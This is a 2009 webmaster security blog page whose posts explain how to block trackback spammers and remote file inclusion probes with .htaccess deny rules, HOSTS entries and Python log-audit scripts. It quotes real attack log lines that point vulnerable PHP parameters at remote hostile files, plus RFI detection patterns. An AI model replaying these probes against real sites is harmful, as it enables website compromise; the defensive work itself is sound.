November 19, 2009

Block trackback spammer operating on Ubiquity Server Solutions

Over the past few days I have discovered that a script, or a person operating a server farm at Ubiquity Server Solutions, has been attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer in the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers" not understanding a 403 Forbidden response when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.



<Files *>
# Apache 2.2 mod_authz_host: Deny rules are evaluated first, then Allow;
# anything not explicitly denied is allowed.
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

# If your host's AllowOverride does not permit "Options", this line causes a
# 500 error; remove it and ask your host to enable FollowSymLinks instead.
Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

# Answer 403 Forbidden to any request whose User-Agent is exactly "tbr/0.1.0"
RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]



You should determine if legitimate visitors to your blogs are using the tbr/0.1.0 user agent. If so, don't block it. In all likelihood, only spammers use that tool with that version number.
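
Here is one way to make that determination from the raw access log. This is an added example, not code from the original post: it parses Apache combined-format lines, reports what one exact user-agent string did (which addresses sent it, whether it ever fetched a page with GET as a reader would or only POSTed to trackback endpoints as a bot would, and what status codes it received), and collapses the offending addresses into the /24 ranges for "deny from" rules. The log text is constructed from the entries quoted above plus one hypothetical ordinary visitor (192.0.2.10 with a Firefox user agent); the function names are my own.

```python
"""Audit an Apache combined-format access log for one exact user-agent string.

Added example for this post, not code from the original page. The log text
below is constructed from the entries quoted in the post plus one hypothetical
ordinary visitor (192.0.2.10, Firefox).
"""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
192.0.2.10 - - [18/Nov/2009:09:00:00 -0800] "GET /blogs/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20091102 Firefox/3.5.5"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def user_agent_report(records, user_agent):
    """Summarise what one exact User-Agent string did.

    A UA that only POSTs (to trackback/comment URLs) and never GETs a page is
    a tool, not a reader, so blocking it costs no real visitors.
    """
    hits = [r for r in records if r["ua"] == user_agent]
    report = {
        "hits": len(hits),
        "ips": sorted({r["ip"] for r in hits}, key=ip_address),
        "methods": Counter(r["method"] for r in hits),
        "statuses": Counter(r["status"] for r in hits),
        "paths": Counter(r["path"] for r in hits),
    }
    report["looks_like_bot"] = bool(hits) and report["methods"]["GET"] == 0
    return report


def deny_networks(ips, prefixlen=24):
    """Collapse offending addresses into the /prefixlen networks containing them.

    These are the narrowest 'deny from' ranges that still cover every observed
    source; the post blocks a /24 instead of the provider's whole /22 for
    exactly this reason (less collateral damage to other customers).
    """
    nets = {ip_network(f"{ip}/{prefixlen}", strict=False) for ip in ips}
    return [str(n) for n in sorted(nets)]


def htaccess_rules(networks, user_agent):
    """Render the same mod_authz_host and mod_rewrite lines the post uses."""
    lines = ["order deny,allow"] + [f"deny from {n}" for n in networks]
    lines += ["", "RewriteEngine On",
              "RewriteCond %{HTTP_USER_AGENT} ^" + re.escape(user_agent) + "$",
              "RewriteRule .* - [F]"]
    return "\n".join(lines)


if __name__ == "__main__":
    report = user_agent_report(parse_log(SAMPLE_LOG), "tbr/0.1.0")
    print(report)   # looks_like_bot: True, 4 hits, 3x 403 and 1x 302
    print(htaccess_rules(deny_networks(report["ips"]), "tbr/0.1.0"))
```

Run it against your own access_log instead of SAMPLE_LOG. If the report for "tbr/0.1.0" shows GET requests for real pages from addresses outside the spammer's ranges, someone legitimate is using that agent and you should block only the CIDRs, not the user agent.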

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

November 14, 2009

Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any given week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending it requests designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve pointing a parameter of a known-vulnerable PHP script at a hostile file on a remote server, so that the script fetches and executes it. These are loosely called PHP injection exploits; the precise name is remote file inclusion (RFI). Of those targeted scripts, the one that I see almost every day in my access logs is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, hacker, or bot doesn't try to inject hostile files into my server via Coppermine exploits, as demonstrated in the following actual log entry:


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless Inter-Domain Routing." A CIDR prefix is written as a starting IP address followed by a forward slash and a number: the number is how many leading bits of the address are fixed, and the remaining bits are free to vary across the range. In this case, 70.84.0.0/14 fixes 14 bits and leaves 18, so it covers 2^18 = 262,144 addresses, from 70.84.0.0 through 70.87.255.255.
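
The same arithmetic in working code, as an added example that is not part of the original post. It uses only Python's standard-library ipaddress module to compute the range a prefix covers, test whether an address falls inside a blocklist (the membership test a "deny from" rule performs), find the narrowest prefix that still contains every attacker address you have seen (the trade-off behind blocking a /24 rather than the provider's whole allocation), and merge overlapping ranges so a blocklist stays short. The prefixes and addresses are the ones quoted in the posts on this page; the function names are my own.

```python
"""CIDR arithmetic for building and checking 'deny from' blocklists.

Added example for this post, not code from the original page; it uses only the
standard-library ipaddress module. The prefixes and addresses are the ones
quoted in the posts on this page.
"""
from ipaddress import ip_address, ip_network, collapse_addresses


def cidr_range(cidr):
    """First address, last address and size of a prefix.

    A /14 fixes the first 14 bits and leaves 32 - 14 = 18 free, so it holds
    2**18 = 262,144 addresses: 70.84.0.0/14 -> 70.84.0.0 .. 70.87.255.255.
    """
    net = ip_network(cidr, strict=False)
    return str(net.network_address), str(net.broadcast_address), net.num_addresses


def is_blocked(ip, blocklist):
    """Would this source be caught by a list of 'deny from' CIDR strings?

    This is the same membership test Apache applies to each deny rule.
    """
    addr = ip_address(ip)
    return any(addr in ip_network(c, strict=False) for c in blocklist)


def smallest_covering_prefix(ips):
    """The single narrowest network that contains every observed attacker.

    Widen from a /32 one bit at a time until all addresses fit. Blocking this
    rather than the provider's whole allocation limits collateral damage to
    innocent customers of the same host; widen it by hand (the post goes to a
    /24) if the attacker is seen rotating across the wider range.
    """
    addrs = [ip_address(i) for i in ips]
    net = ip_network(str(addrs[0]))          # starts as a /32
    while not all(a in net for a in addrs):
        net = net.supernet()
    return str(net)


def minimal_blocklist(cidrs):
    """Merge overlapping and adjacent prefixes so the .htaccess stays short.

    Two adjacent /24s become one /23; a /24 already inside a listed /22 is
    dropped. The set of addresses denied is unchanged.
    """
    nets = (ip_network(c, strict=False) for c in cidrs)
    return [str(n) for n in collapse_addresses(nets)]


if __name__ == "__main__":
    print(cidr_range("70.84.0.0/14"))                     # ('70.84.0.0', '70.87.255.255', 262144)
    print(is_blocked("70.85.136.34", ["70.84.0.0/14"]))   # True
    print(smallest_covering_prefix(["64.120.5.197", "64.120.5.241",
                                    "64.120.5.196", "64.120.5.254"]))
```

Note that smallest_covering_prefix only reflects the addresses you feed it: the seven Ubiquity addresses in the trackback post above fit in 64.120.5.192/26, but the author saw the spammer rotate through the whole 64.120.5.0 - 64.120.5.255 range and blocked the /24 accordingly.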

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent string "Mozilla/5.0" with nothing after it. No real browser sends that bare string; it is the default identifier used by the exploit scripts whose probes show up in my logs. Read on and learn how to protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or from "Mozilla/5.0" hack tools.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »

July 18, 2009

Protect your Apache hosted website from Chinese exploit attacks

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I were running a vulnerable version of the targeted "Coppermine" software, that remote file inclusion attempt would have yielded a server 200 Success instead of a 403 Forbidden response, and the file fetched from the attacker's server would have been executed as PHP on mine. This would have led to the exploitation of my website, and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Continue reading "Protect your Apache hosted website from Chinese exploit attacks" »

May 22, 2009

Vulnerabilities roundup for May 18 - 22, 2009

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and QuickTime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL injection flaws that can be or are being exploited to inject hostile redirection code into websites.

Windows Vulnerabilities

On 5/18/09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by the use of vulnerable libsndfile code. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability is currently unpatched, the best advice is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »

May 15, 2009

Securing FormMail scripts against spambots

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknown to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop-in secure replacement script known as NMS FormMail, which was developed by a group calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested by creating alias numbers for them, in NMS FormMail, instead of using plain text addresses to submit to. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »

May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website that is running PHP or CGI scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple QuickTime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in C:\Windows\System32\drivers\etc\, with the unusual file name: HOSTS. Although it has no file extension it can be opened and edited using the built-in Windows Notepad. Each line of the HOSTS file takes an IP address followed by one or more host names, separated by a tab or multiple spaces; the resolver consults it before DNS, so a host name listed there never reaches the real server. Note that it works on host names only: a line naming an IP address or a CIDR is simply ignored, so the Ukrainian server's IP address must be blocked in your firewall, not in HOSTS. To protect your computer from being redirected to the hostile tojandglow website, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Computer, double-click on the C drive icon, then navigate to your Windows\System32\drivers\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add this line, with a tab after 127.0.0.1 (host names only; lines such as "127.0.0.1 91.212.65.138" or "127.0.0.1 91.212.65.0/24" are not valid HOSTS entries and do nothing, so block that server's address range in your firewall instead):

    • 127.0.0.1       tojandglow.com


  11. Click File > Save and in the File Type selection, choose All Files and save it as HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


Reboot your computer to make this protection take effect (flushing the resolver cache with "ipconfig /flushdns" at a command prompt also works without a reboot). From that point on any script that tries to redirect you to a host name listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile host name is published, and put raw IP addresses and ranges in your firewall's block rules instead.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.
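
A small audit script for the two points above, added here as an example and not part of the original post. It reads a HOSTS file, flags entries whose name column is an IP address or a CIDR (which the Windows resolver ignores, so they protect nothing), and flags Microsoft or security vendor domains that have been pointed at 127.0.0.1 or 0.0.0.0, the hijack pattern malware uses to cut off updates. The sample file content and the vendor list are constructed for the example; extend the list with the vendors you actually rely on.

```python
"""Audit a Windows HOSTS file for entries that cannot work and for malware hijacks.

Added example, not code from the original post. The file content and the
vendor list below are constructed for the example.
"""
from ipaddress import ip_address, ip_network

# Domains that should never resolve to the local machine (assumed list).
PROTECTED_DOMAINS = (
    "microsoft.com", "windowsupdate.com", "symantec.com", "norton.com",
    "trendmicro.com", "mcafee.com", "kaspersky.com",
)

# Constructed HOSTS content: the post's entries plus two malware-style lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       tojandglow.com
127.0.0.1       91.212.65.138
127.0.0.1       91.212.65.0/24
127.0.0.1       windowsupdate.microsoft.com   # planted by malware
0.0.0.0         www.symantec.com
"""


def parse_hosts(text):
    """Yield (line_no, address, [names]) for every non-blank, non-comment line."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        address, *names = line.split()
        yield line_no, address, names


def looks_like_ip_or_cidr(token):
    """True for '91.212.65.138' or '91.212.65.0/24'; False for a host name."""
    try:
        ip_network(token, strict=False)
        return True
    except ValueError:
        return False


def audit_hosts(text, protected=PROTECTED_DOMAINS):
    """Classify each name in the file as effective, ineffective or a hijack."""
    report = {"effective": [], "ineffective": [], "hijacks": []}
    for line_no, address, names in parse_hosts(text):
        try:
            target = ip_address(address)
        except ValueError:
            continue                      # malformed first column; skip it
        sinkholed = target.is_loopback or target.is_unspecified
        for name in names:
            entry = {"line": line_no, "address": address, "name": name}
            lname = name.lower()
            if looks_like_ip_or_cidr(name):
                report["ineffective"].append(entry)
            elif sinkholed and any(lname == d or lname.endswith("." + d) for d in protected):
                report["hijacks"].append(entry)
            else:
                report["effective"].append(entry)
    return report


if __name__ == "__main__":
    for kind, entries in audit_hosts(SAMPLE_HOSTS).items():
        print(kind, [e["name"] for e in entries])
```

To check your own machine, read C:\Windows\System32\drivers\etc\hosts into the text variable instead of SAMPLE_HOSTS. Anything in "hijacks" should be deleted; anything in "ineffective" should be moved to a firewall rule (the Windows XP firewall only filters inbound traffic, so on XP use a router or a third-party firewall for outbound IP blocks).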

Continue reading "Block Ukrainian Malware Server on Eurohost" »

April 14, 2009

Russian Server sending exploit codes. Block 77.221.128.0/19 now!

Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But the attack I logged this morning was different from the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that it is assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center whose assigned address range is 77.221.128.0 - 77.221.143.255, designated by the network CIDR 77.221.128.0/19.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow): the deny rules are evaluated first, then the allow rules, and the default for anything not matched is allow. A request from a denied address gets a 403 Forbidden response. (These are Apache 2.2 mod_authz_host directives. Apache 2.4 replaced them; there the equivalent is "Require all granted" together with "Require not ip 77.221.128.0/19" inside a <RequireAll> block, unless the server still loads mod_access_compat.)

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. Blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, The Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htaccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and every service on it, including email and FTP servers. A .htaccess blocklist can only deny access to HTTP and HTTPS traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Continue reading "Russian Server sending exploit codes. Block 77.221.128.0/19 now!" »

February 1, 2009

Block server script injection exploits targeting your websites

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast hostile exploitation requests at other servers. This probe is a remote file inclusion attempt: it feeds the URL of a file named id1.txt to a script parameter (sIncPath) in the hope that a vulnerable script on my site will fetch that file and execute it as PHP (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

  1. A website's home page (index.html, index.php, etc.)
  2. A "Welcome to Apache" screen, for a new website on an Apache server
  3. A Welcome to cPanel or WHM screen
  4. A welcome screen for an unconfigured website hosted on a Windows IIS server
  5. A 403 Forbidden message (someone doesn't want me poking around)
  6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of its pages, or inject hostile scripts into it, without logging in with the correct credentials. Maybe this server used a weak user name and password combination that was cracked with a dictionary or rainbow table attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to log in to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.
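
The probes quoted in this post (sIncPath=http://...) and in the ThePlanet and Chinese-attack posts above (Coppermine's theme.php?THEME_DIR=http://...) all have the same shape: a script parameter pointed at a file on a remote web server, usually with a trailing "?" or "??" and a bare "Mozilla/5.0" user agent. The following is an added example, not code from the original posts, that finds that shape in an access log and also shows what a blanket .htaccess rule against it would cost. The log lines are constructed for the example, with attacker.example standing in for the real hosts; the regex and function names are my own.

```python
"""Spot remote-file-inclusion (RFI) probes in Apache access logs.

Added example, not code from the original page. The log lines below are
constructed for the example; attacker.example stands in for the real hosts.
"""
import re
from urllib.parse import parse_qsl

# Usable verbatim in .htaccess as:
#   RewriteCond %{QUERY_STRING} (^|&)[^&=]*=(https?|ftp):// [NC]
#   RewriteRule .* - [F]
# Python's re and Apache's PCRE agree on this pattern.
QUERY_RFI_PATTERN = re.compile(r'(^|&)[^&=]*=(https?|ftp)://', re.I)

# Only the request target, status and user agent are needed from each line.
REQ_RE = re.compile(
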